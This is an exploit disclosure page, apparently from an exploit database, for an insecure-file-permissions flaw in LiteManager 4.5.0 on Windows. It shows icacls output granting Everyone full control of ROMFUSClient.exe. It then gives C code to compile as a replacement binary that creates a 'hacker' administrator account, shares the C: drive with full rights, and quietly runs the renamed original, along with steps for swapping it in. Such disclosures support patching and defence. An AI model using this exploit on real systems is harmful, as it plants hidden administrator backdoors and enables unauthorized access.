LiteManager 4.5.0 – Insecure File Permissions

  • 作者: ZwX
    日期: 2019-11-22
  • 类别:
  • 来源:
  • # Exploit Title: LiteManager 4.5.0 - Insecure File Permissions
    # Exploit Author: ZwX
    # Exploit Date: 2019-11-21
    # Vendor Homepage : LiteManager Team
    # Software Link:
    # Tested on OS: Windows 7 
    # Proof of Concept (PoC):
    C:\Program Files\LiteManagerFree - Server>icacls *.exe
    ROMFUSClient.exe Everyone:(F)
     AUTORITE NT\Système:(I)(F)
    #Exploit code(s): 
    1) Compile below 'C' code name it as "ROMFUSClient.exe"
    int main(void){
     system("net user hacker abc123 /add");
     system("net localgroup Administrators hacker/add");
     system("net share SHARE_NAME=c:\ /grant:hacker,full");
     WinExec("C:\\Program Files\\LiteManagerFree\\~ROMFUSClient.exe",0);
    return 0;
    2) Rename original "ROMFUSClient.exe" to "~ROMFUSClient.exe"
    3) Place our malicious "ROMFUSClient.exe" in the LiteManagerFree directory
    4) Disconnect and wait for a more privileged user to connect and use ROMFUSClient IDE. 
    Privilege Successful Escalation